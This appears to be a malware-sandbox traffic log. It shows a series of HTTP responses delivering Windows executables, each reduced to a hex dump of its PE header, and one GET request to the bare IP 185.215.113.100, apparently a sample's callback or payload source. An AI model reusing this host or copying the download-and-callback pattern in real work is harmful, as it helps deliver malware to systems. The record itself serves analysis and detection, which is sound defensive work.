Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 13:42:49 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 13:42:54 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 13:42:55 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 13:42:56 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 13:42:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 13:42:58 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 13:42:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
